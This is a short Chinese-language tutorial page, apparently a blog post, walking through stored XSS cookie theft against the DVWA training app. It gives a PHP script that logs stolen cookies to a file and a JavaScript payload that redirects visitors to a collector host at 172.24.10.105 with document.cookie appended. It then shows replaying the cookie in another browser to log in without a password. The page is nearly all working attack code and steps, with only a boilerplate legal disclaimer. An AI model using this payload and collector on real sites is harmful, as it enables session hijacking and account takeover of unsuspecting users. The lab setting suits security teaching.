您好,登錄后才能下訂單哦!
聲明:僅供交流使用,嚴禁違法犯罪,否則后果自負
1,準備接收cookie的環境:
ip為172.24.10.105
代碼為:保存為 getCookie.php
<?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "w"); fwrite($log, $cookie ."\n"); fclose($log); echo "***成功"; ?>
2,在實驗環境插入js代碼:
<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>
通過審查元素把限制取消,然后插入js代碼
然后重新訪問這個頁面發現進行了跳轉
并在接收cookie的平臺看到了cookie
換一個瀏覽器設置cookie
直接訪問:
http://127.0.0.1/DVWA/
無需密碼登錄成功
歡迎關注微信公眾號
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。